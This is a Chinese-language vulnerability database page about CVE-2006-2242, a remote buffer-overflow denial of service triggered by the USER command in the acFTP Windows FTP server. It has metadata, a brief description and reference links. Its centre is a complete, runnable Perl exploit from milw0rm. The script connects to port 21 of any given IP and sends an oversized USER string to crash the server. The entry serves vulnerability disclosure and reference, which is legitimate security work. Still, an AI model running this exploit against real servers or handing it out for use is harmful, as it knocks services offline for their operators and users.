acFTP USER命令 远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110209 漏洞类型 其他
发布时间 2006-05-04 更新时间 2006-05-09
CVE编号 CVE-2006-2242 CNNVD-ID CNNVD-200605-168
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1749
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-168
|漏洞详情
acFTP是一款开源的基于Windows平台的FTP服务器程序,用于取代Windows系统自带的FTP服务器。acFTP对畸形的用户请求处理存在漏洞,远程攻击者可能利用此漏洞对服务器程序进行拒绝服务攻击。攻击者可以通过向服务器发送畸形的USER命令溢出缓冲区导致服务器进程崩溃。
|漏洞EXP
################################################
#===== acFtpd BoF Crash Exploit =====
#
# There is a Buffer overflow at the
# USER command in acFtpd.
#
# Vuln found by: Preddy
# RootShell Security Group
#
# Usage: ac_dos.pl <ip>
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";
my $overflow = "A{" x 4700;

if($ARGV[0] == "")
{
print "################################################\n";
print "# ===== acFtpd BoF Crash Exploit =====\n";
print "#\n";
print "# Vuln found by: Preddy\n";
print "# RootShell Security Group\n";
print "# www.rootshell-security.net\n";
print "#\n";
print "# Usage ac_dos.pl <ip>\n";
print "################################################\n";
}

        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Sending Overflow String!\n";
                print "Ftp should be crashed!\n";

                Win32::Sleep(300);

                print $socket "USER $overflow\r\n";

                Win32::Sleep(100);


                close($socket);
        }

# milw0rm.com [2006-05-04]
|参考资料

来源:XF
名称:acftp-user-dos(26258)
链接:http://xforce.iss.net/xforce/xfdb/26258
来源:BID
名称:17855
链接:http://www.securityfocus.com/bid/17855
来源:OSVDB
名称:25278
链接:http://www.osvdb.org/25278
来源:MILW0RM
名称:1749
链接:http://www.milw0rm.com/exploits/1749
来源:VUPEN
名称:ADV-2006-1674
链接:http://www.frsirt.com/english/advisories/2006/1674
来源:SECUNIA
名称:19978
链接:http://secunia.com/advisories/19978
来源:MILW0RM
名称:1749
链接:http://milw0rm.com/exploits/1749